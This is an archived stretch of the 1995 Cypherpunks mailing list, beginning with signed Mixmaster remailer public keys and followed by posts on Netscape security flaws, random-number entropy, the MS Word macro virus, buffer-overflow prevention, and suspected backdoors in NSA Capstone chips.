5ngjOGDQaLQvGUbNHRXQaPAZ0rc4lv9gmChJONOJ
7sFC2J96QR4aewAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

hroller hroller@c2.org 0b7e31bbfbb0159eea07144ab15b45f3 2.0b11

- -----Begin Mix Key-----
0b7e31bbfbb0159eea07144ab15b45f3
258
AAS+WXQ5iseHl1nf+gSXmIZbIScPI2Py9e+o+UCY
FQT86f/cKyblwb/SY5v4A3pykyxTDC/T+f416Lel
A7PhZfvSix/yM73f2yUCaFt7w9vFNmf4Y+5h/FWJ
fNj0wwmy5foWIhlDkI3ue1uy4GZ18H5s43bs5qyz
3wDtH8C5wEbpJwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11

- -----Begin Mix Key-----
3d523f1fd30b5a1c57214960a00f1c4e
258
AATQ2zxiRZ5bQuNBKHEvg11R7L69Hc9ZrjTon3o3
s7fbXmuEaiym48sHoRLAttZ3ADuH1FgbuYt1DF+L
Il9Yp5U9znm9MX0rS8xq1iGg7YDED/3x6OWIp7za
17+pWnYmEF+Rz6YZ2o/67ujcBfrJ/odz+SVlaGqF
rWWjaG/oWdqWWwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11

- -----Begin Mix Key-----
6c4e7372e84d7092e0d0e69c20d5be46
258
AATKhnhAIHXRCKZAi2tehJfQ9s+IsVPjEQQk5xwQ
60VXzmgkC2YirmDFeLz1feNgCMd78GkKHYK5p9WM
HBkPNTDPLraJhJLNDHeHqGtqAI4BTHq/lZ/RMyOH
GV/X5TaUEG69IGb2Rl8OnzNWF9fhKwH6PTE+QiQX
kIcxJnVW+yYOpwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11

- -----Begin Mix Key-----
e7d84921298b0aadaf8f050d145ccf03
258
AASjOGqzTLdjweTMiwirrpVNqXj/ODJVyh9pEo5i
q5ERILOd1hMNKY9XLNFYM30mUR/Fkh0MnYI/ujWz
OTb0rR2a31nvmaLMdaB75nTdGJwHitCmo8k2eTjL
XQsXV6zKrzXGp8H8NO34DAFWJy1qVcev+6lLAWGy
j/fsJJyJNtl94wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11

- -----Begin Mix Key-----
e3e2b4d67314b6165ee03b0b0ae07a7f
258
AATZBfJhv+DGg4OEfQfgVnzZZpumEZHI9CES+Ux2
dBp9RBPpJnAtLpcAyCIkNjSaik0togcKhFgcR3nt
XIrWclJ/uO/Z1fqW7ESLwzXozCpqnG5S/y6mUPuL
yzA9bqtAGd+pvxuK/Cw2Zzx+1QGp0VtWb46KxqvC
S4POHYFljkrQiQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11

- -----Begin Mix Key-----
bf61835a7b3cfa59c409caeab4e8a222
258
AATkwgy72zwwavCHn1OytNMsBYAIBnCFa2hcbZPi
IN6eS4jDgFdld5DlcqqzdN6Lxv96i0Dg7ElFyAFR
5zmof3oaNqh5vbq/fTEbvFtX9EGyuqkfN6fKoAEv
G7gtmkfosoIg/jnI8AL9KC/J5mGaxrWYB6XBe+v9
iI1pOSbPsDCsdQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11

- -----Begin Mix Key-----
64c62de6b347b3050fbb6e94c649112d
258
AATLe0CWPSn844FCeL7FzUlf+vE2qfYBPs/8PYYm
BfITjknJjD0dk7vXhX9Qc5PFgDWRHhVoIRlFT3sc
Jp2UVFLOZ5zn/WiT9Wa1tZsqejDf3MRIDT/K6cHB
uB/SUaxLzNfk/wG1uBTUHukdjwCyDxNLHuYA5mVz
opYJhQR0Nc/ESQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

spook remailer@spook.alias.net ca8c8679f7b1cbdcff46d780fba97673 2.0

- -----Begin Mix Key-----
ca8c8679f7b1cbdcff46d780fba97673
258
AATZXVb4yP3MGt/ZCR5FtrHPMgYNyXHBmnG8KWO0
UaT5jbMqBdRQEzOVrCN/5RXerpS8Hctbc5MrwhSr
fh/byQLwLkY50zYAxWSRBpaAJgZtCnQtVTgmt9yu
BDiCE2OasFnZlwsi+9t8+c5R2bS3C6UhjQsgybbF
Aw7xWK3v3fPJqQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11

- -----Begin Mix Key-----
64bbf500097b541a8ddcb2dd80373238
258
AAS5NFs7yPSFv+WwpO26/2OS7CYJDtrhlrEasf8S
jJ9P0jqWXuorDIMKT3YfvSkk2xKqAHiHrOFEqltY
plIUCoXyAf/7CmNyPYdTN6xNxO74ZIsTQnNgAJT3
6a8+JL92DZJM6pYfhpSvPq7lj5X0h6Hj/oCAlqiS
31TZJkd2jenjDQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1

- -----Begin Mix Key-----
1d767b08fefa0a79d508be73e472d326
258
AATAwVkC3FI6NDi0GJvH+FBIK6MYVHvXofEoKMTc
u7P1rI7yCW00JOF71k373wyepZDksw9wjZdrHZAB
uyN7SICMaKPRvMA4rseZFjefzYaoFf5tO0OqFgcQ
/pMOPDwYl0nHyuLJvqjpADMDtatQaN2+/T/HtcMX
Q1KCcLk24jEWbQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1

- -----Begin Mix Key-----
c44e1cb0f0709465c21b07ac972bf973
258
AATDBaiKBy4jPlRUIQmVvcjO/GhWLbsls+mKloml
5EScYl+3fGw04P4xVcWOSledFVxKVfNy+xTVI8pE
XGXSr0cRUIa1NttzNPk/KObb5SvkeqGtWAyRiWBS
G91MkWM6LbqzKPcu6gUON47wJCJCzdvgbUIeVJIT
MnyBvMWJX5CKAwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

- -----Begin Mix Key-----
7251877ae6fed509ebf7567715974d1b
258
AASWRIpH97WDVCNc/kiLqvmxqwN9cAAbZFi+FIwr
gCixQRTtD/SXuXd62iIqRMp3xm4c+uSnTzLijIxi
fCYLacNMVeh0PXAszfFIh6CBicPq1UWt82Wu5dqw
K/goNULqNDUypGQtOfOpHSQKPwAphXplKhv75OZs
SjtMoEcv0CCk3wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

precipice mixmaster@mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1

- -----Begin Mix Key-----
05fef5887ac55dfe7379d0ef4a2a0c4b
258
AATIdI/+dQ3rsvREcdYsnJkd+zQKCkPerZsyDXmX
NaYjUTwMhiHHjl/e7Zqx/mUAUQnifQfg4KpHvBGL
a6rQUTQjRhhz8sOvynyJci4NTm8DFDjYdTpvnbjp
YPu7xNhSfg7fmqXuqCan1M/AmpU1r6sF6M6gA0W4
EpOqFaJo7g32xQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b

- -----Begin Mix Key-----
bc2e4251dbddfa74dfae8b274904c2be
258
AATBBbpmFw7omad8hpvxQiylmoi5MBXs5SivpcY6
65jnhZIiL9HvTE+Rq+30STccDsQWze0/iZthg1RL
tCXYtABwkfsHOf60/aq1aOBobkquzBItvzQMG0W/
TkVinZYUTqfdytl/pfLDIQiXv7Z0t98MrLsmVopE
1NQS7sH6g9srFwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB

anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b

- -----Begin Mix Key-----
e3ca4cc5beb9934ae6d52dd27da80332
258
AATZuNYrX4bw6A01PA00qMr7KeJsnHIq9wYoSc5P
OrHUEvPUoCxmLfuhwF9eEfSkV4t9DLPIMhKXM4iL
Afhv2IZKeWaA98q4NHb6E7Gg6/e6uCI1O3nmXXK8
la4ij9RneCHig5K6JlCh3MJTkuW/IEYQjMrz2/H5
RUDEwx+/HL5K0QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMGNIN6ghiWHnUu4JAQEeJgf8CWZIoe/3Z7RMXBcdIHsVYnkRcd0BWLIE
Wqt/SaIKTjqBP7wP+vdiPOkpQXpwfVCw70DS6T46xDq0Y045caaaj2AhoQ1ObPPy
ifVTBLI7bctvR0R2/3fUitT3iJdK1u5LHMrbmTneOWo1DHpIDts0fH/EeHTNUVQ9
MrOqu5dQNOBLWpcG7zqQ66ffmxMXVnht7jF+mugbK668/5l3WyyHl8ZYrzojeEBx
ROmKOsp4Ij2YD1tZINAFXGtFo71hj3MFY8QT+sgUKjPDsmvIYi6XxCrP98I5SzMG
bM2q2gNf4hhLhtWoRu+jwK1BEEM+pf3M9UNug8kvqH90eAk26j79+A==
=B/n/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 22 Sep 95 18:27:21 PDT
To: cypherpunks@toad.com
Subject: "Going after Netscape"
Message-ID: <ac88af4202021004670f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 AM 9/23/95, Jim Ray wrote:

>I'm with Lucky, let's go after Netscape itself. They deserve it more
>than their customers do, and they would then have a strong motivation
><evil grin> to fix it. The press release would then *only* involve
>Netscape, and maybe a few C-punks could buy a few Netscape puts ;)
>and donate the bucks made for something like Tim's stable remailer.

I think we need to be very careful not to do things like we have a vendetta
against Netscape.

Netscape has a Cypherpunks presence, of course, and His Andreeseeness was
even on the list for a while last December.

Today's "San Jose Mercury News" had a photo of Goldberg and Wagner and a
fairly long article about how James Barksdale, Pres. of Netscape, plans to
hire them to help improve Netscape's security. He even made noises about
thanking them for their cracking efforts, and said improving Netscape's
security is a high priority.

It's sort of hard for me to imagine a company being more "Cypherpunks
friendly" than this.

(I mean about the issues that interest us.)

So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've
seen Netscape bomb on certain sites, as with the Cypherpunks archive site,
as several of us noted a few months ago...probably a different problem, but
indicative that Netscape can be corrupted). But let's be careful not to
convey any flavor of this being a vendetta.

--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Fri, 22 Sep 95 17:50:33 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: RNG Resource FAQ (was Re: "random" number seeds vs. Netscape)
Message-ID: <30635951@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger writes:
# You might want to read RFC 1750,

Phil Karlton writes:
> Did that. It talks about a lot of the pitfalls. Unfortunately it does not
> address (nor can it realistically be expected to address) details of what
> to look for on a particular version of an OS running on some particular
> platform.

Can someone point me to a compilation of such information ?  If not, I'm
definitely interested in starting a Web page to chronicle recommendations
about good, bad, and questionable random and pseudo-random sources for
specific architectures and operating systems. (It could also include
information on special-purpose plug-in hardware RNGs.)

 -Futplex <futplex@pseudonym.com>

Having overcome my initial skepticism on the entire topic of entropy, based 
on the useful pointers to the literature I have received, I agree 
wholeheartedly with the need for _positive_ design criteria against which 
designs may be evaluated.  For initial consideration, I recommend the 
following:

The entropy E is defined by the sum across n states of -P_i log_2(P_i), 
where i ranges from 1 to n, and P_i is the probability of state i.  In order 
for this expression to have meaning, the all four criteria of the following 
must be met:

1)  The states exist and can be identified.
2)  The number of states n is known.
3)  The index value i uniquely identifies a state.
4)  The function P_i is known and well-behaved.

The designer should disprove the negative of each of these to arrive at a 
_concise_ statement of their "proof" of measured entropy equating to 
predicted entropy.  For example, the designer should "disprove" the 
statements: "The states do not exist.  Even if the states exist, they cannot 
be identified." by clearly stating the factors that lead to the existence of 
the states, and precisely why they can be identified.  This provides a list 
of requirements (in effect) for a deployment to meet the expected entropy.

I think that application of these criteria can rigorously explain the 
difficulties in using mouse movements, for example, as a source of entropy. 
 In addition, the problems with clocks in PC emulations on Macs also speak 
to these criteria.  Certainly the entropy available from pid is also 
explained here in a rigorous way.

I would appreciate feedback on this as a foundation for a set of _positive_ 
design criteria for sources of entropy.  If I have missed information in the 
literature that provides design guidance (not anecdotal pitfalls, which are 
very valuable but lack rigor in the cases I have seen), I would very much 
appreciate that as well.  A special thanks to Tim May for his references.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 22 Sep 95 18:45:16 PDT
To: cypherpunks@toad.com
Subject: More on "Entropy"
Message-ID: <ac88b54604021004d0c0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:46 PM 9/22/95, David Van Wie wrote:

>Having overcome my initial skepticism on the entire topic of entropy, based
>on the useful pointers to the literature I have received, I agree
>wholeheartedly with the need for _positive_ design criteria against which
>designs may be evaluated.  For initial consideration, I recommend the
>following:
>
>The entropy E is defined by the sum across n states of -P_i log_2(P_i),

Hah! Another physicist converted to the information-theoretic view of entropy!

I should've pointed out in my reading list that several names stand out in
this interpretation:


- Charles Bennett

- Rolf Landauer

- John Wheeler


Just so you know.

ObNetscapeHack: None.


--Tim May


Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 22 Sep 95 16:47:15 PDT
To: cypherpunks@toad.com
Subject: MS Word Virus
Message-ID: <199509222347.TAA00888@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


For info and helpful links on the MS Word macro virus, see:


     URL: http://csrc.ncsl.nist.gov/first/resources/word.html


---------

Information on the Microsoft Word Virus Reports

   Comments welcomed: first-sec@first.org 
   
   This page contains links to information and related 
utilities for the
   Microsoft Word Macro Virus. The links and text on this page 
were
   mostly donated by a fellow FIRST member. The FIRST 
Secretariat would
   like to express its appreciation to this member and others 
who have
   contributed information.
   
   Microsoft's Writeup  Microsoft has a writeup on the 
virus-like macro
   and has a scanning tool to remove the problem.
   
   Macintosh advisory
   
   DataFellows Web page         DataFellows (the people who 
produce
   FProt) has an excellent informational web page, including 
images of
   what you would see if you had the virus. Also, you can 
download
   DataFellows' utility, which works on both PC's and 
Macintoshes.
   Download DataFellows Utility
   
   IBM Writeup  An excellent write up by IBM.
   
   NCSA page    The National Computer Security Assiciation has 
a page
   which contains images of what you'd see if you had the 
virus.
   
   S&S Writeup  A writeup by S&S, the makers of Dr. Solomon's 
Antivirus
   Toolkit
   
   Sophos Plc   A page written by Sophos Plc.
          
   AVP Page
          Eugene Kaspersky of the AVP Computer Virus Research 
Lab, wrote
          this excellent web page on the virus.
          
   Dave Phillips Information page.
          A page written by Dave Phillips.
          
   NH&A</a>
          A page consisting of an announcement and email 
traffic, written
          by NH&A.
          
   Datawatch Virus Definition Update
          Datawatch, (Virex), present a virus definition update 
to their
          product to find this virus on Macintoshes.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 22 Sep 95 17:53:21 PDT
To: dmandl@panix.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <Pine.SUN.3.91.950922154119.7388A-100000@panix.com>
Message-ID: <Pine.SUN.3.90.950922194817.11370A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Actually it allows you to imbed data and commands to run. What the latest
MSWord virus did is imbed a virus dropper encoded in the word document
and then run it trough the dos debug command to make it a binary file
(if you ever read the 40HEX virus magazine you should know how this works).
From there it just run the dropper.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Fri, 22 Sep 1995 dmandl@panix.com wrote:

> Is that the new MS-Word you're thinking of?  I hear that it lets you
> imbed macros containing executable code in documents.  That's got to
> be one of the most dangerous ideas ever cooked up.
> 
>    --Dave.
> 
> --
> Dave Mandl
> dmandl@panix.com
> http://wfmu.org/~davem
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 22 Sep 95 19:41:09 PDT
To: cypherpunks@toad.com
Subject: T-Shirt Spams
Message-ID: <ac88c2e50602100403f6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:42 PM 9/22/95, Don Henson wrote:
>By now, everyone knows about the TSHIRT that has been classified as a
>MUNITION by the US Goverment. If you don't know, just send email to

Oh, really? Which government agency declared this t-shirt to be a munition?

Inquiring minds want to know.

(I wouldn't say more, except these t-shirt spams are getting wearisome.)

--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcorgan@aeinet.com
Date: Fri, 22 Sep 95 20:35:47 PDT
To: Ray Cromwell <cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <Chameleon.950922203255.jcorgan@jcorgan-pc.wan.3com.com>
MIME-Version: 1.0
Content-Type: text/plain


>  Irregardless, it's a nasty bug given that you can crash anyone's
>netscape. And on Mac/Win3.1, it may even require a reboot.

Testing here with Win95 results in the equivalent of a segmentation fault...nicely handled.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 22 Sep 95 17:37:47 PDT
To: alt@iquest.net
Subject: Re: The Next Hack
Message-ID: <199509230033.UAA37480@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Al writes:

<snip>

>Maybe a good tactic would be to crack a "secure" server, and send the results
>ONLY to the server operators, along with a description of machine-time
involved.
> 
>Put out a public press release, describing the machine-time involved, how
it was
>possible due to weak crypto imposed by the government, and the possible
>economic and commercial implications of said weak crypto.
> 

I'm with Lucky, let's go after Netscape itself. They deserve it more
than their customers do, and they would then have a strong motivation
<evil grin> to fix it. The press release would then *only* involve
Netscape, and maybe a few C-punks could buy a few Netscape puts ;)
and donate the bucks made for something like Tim's stable remailer.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMGNU321lp8bpvW01AQEtBQP7BdcB2W5bkCel56eUkZVSkPxJv4hPZren
3P/QtZAAVyF8Xt8692m4lPLVMqtgKqkrtzoqVg7zi/56tqwnLmUcv+TnqSxNdctb
H7durUUVgK+yqsz2Jd8pc0dPBFzT5c1IeZFjVmhG4+ChjzeAnd8WRoqy8BYfHr+w
5s8Tk2XlJF0=
=6CRC
-----END PGP SIGNATURE-----
Regards, Jim Ray

  "People are deceived in masses, but enlightened one at a time."
   -- Dick Boddie.
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crocker@cybercash.com (Stephen D. Crocker)
Date: Fri, 22 Sep 95 17:52:27 PDT
To: cypherpunks@toad.com
Subject: Re: Pitfall in producing random numbers
Message-ID: <ac88be5b140210046d3f@[204.254.34.75]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:20 AM 9/22/95, Norman Hardy wrote:
>The virtual PC clock proceeded forward by very predictable
>manner. Perhaps the details were different but the nature of the pitfall is
>clear. I did not notice that pitfall mentioned in RFC 1750. (Its the only
>hazard that I know of that they missed.)

Neat!  I often talk about what happens if inter-keystroke timingis used but
the program is driven by a script.  In essence, running a program under
simulation amounts to running the clock under a script.

Next version.

Thanks,

Steve


--------------------
Steve Crocker                                     Main: +1 703 620 4200
CyberCash, Inc., Suite 430                        Desk: +1 703 716 5214
2100 Reston Parkway                               Fax:  +1 703 620 4215
Reston, VA 22091                                  crocker@cybercash.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Fri, 22 Sep 95 13:52:27 PDT
To: herbs@interlog.com (Herb Sutter)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221341.JAA07664@gold.interlog.com>
Message-ID: <199509222051.NAA10687@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995 09:47:35 -0400, herbs@interlog.com (Herb Sutter)
wrote:
 
> Don't just look at this bug, though... check ALL your static buffers and
> include code to check for overflow writes.  For example, if Netscape is
> written in C or C++ and the above code uses strcpy(), you could change
> strcpy() to strncpy() everywhere (and then set the last char to null in case
> strncpy() didn't).  Your programmers will know what I mean.

Better yet, ban both strncpy and strncat.  Replace them with
differently-named routines (strbcpy and strbcat?) that, given a buffer
length, are GUARANTEED to always give you a properly terminated string
that (including the terminator) does not overflow the specified
buffer.

Even better, use a good string class that does all this automatically
all the time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 22 Sep 95 21:00:41 PDT
To: cypherpunks, gnu
Subject: The Fortezza random number generator is not trustworthy
Message-ID: <9509230400.AA19805@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Yes Fortezza cards can be instructed to produce a random number through one
> of its library calls (someday they'll have a real API).  One of the
> diagnostic tools I had tested this function.  What algorithm do they use?
> Haven't a clue.  Sources say that the RNG implementation may vary from vendor
> to vendor (i.e., GTC, Spyrus, Mykotronix, etc.).

A caution.  I believe that CAPSTONE chips inside the Fortezza card are
highly likely to have back doors in them, above and beyond the Clipper
key escrow feature.  In particular, the random number generator is
probably compromised.

Many of the top-secret NSA documents I have received under FOIA about
Clipper say things like:

    "2.  I briefed the Board on the CLIPPER and CAPSTONE chips and
    their capabilities and summarized the recommendations of the
    19 November session:

    [TWO INCHES OF SOLID BLACKOUT]

    "3.  The Policy Board reached consensus on the following points:

	    [TWO LINES BLACKED OUT]

	    a. NSA will provide for the availability from a vendor of
    a single chip which can be programed for law enforcement access
    exclusively through a key escrow "law enforcement exploitation
    field."  The chip will have no trap doors or other methods
    of access.  This chip is called CLIPPER.

    [THREE INCHES OF SOLID BLACKOUT]

Note that they explicitly say "The chip will have no trap doors or
other methods of access" when talking about Clipper, but all
information about Capstone is blacked out.  There's no such guarantee
about Capstone.

The Digital Signature Algorithm embedded in Capstone is the best "host
algorithm" ever seen for subliminal channels.  A subliminal channel is
a means of communication which imparts information but cannot even be
detected by third parties.  By choosing numbers for DSA signatures
that are not completely random, several subliminal channels are
available, which can leak information as part of normal digital
signatures.  This subliminal information can only be read by someone
who knows a secret about how the non-random numbers were generated.
Gus Simmons, who did seminal work on subliminal channels while at
Sandia Labs, wrote a Eurocrypt paper on this a year or two ago.  The
Capstone chip knows private things like your DSA private key, the last
session key you loaded for Skipjack, etc.  So it has info that is
worth leaking to NSA wiretappers.

Now the plot thickens.  I submitted a FOIA request for all information
the NSA had on subliminal channels.  They responded that they had no
information!  We appealed and got the same answer.

However, subliminal channels are clearly part of the crypto literature
and knowledge base.  They were a major concern when Gus designed
nuclear test-ban verification crypto equipment in the '70s.  The ONLY
way NSA can legally claim to have no information on subliminal
channels is if the MERE FACT OF THE EXISTENCE AT NSA of information on
subliminal channels is classified.

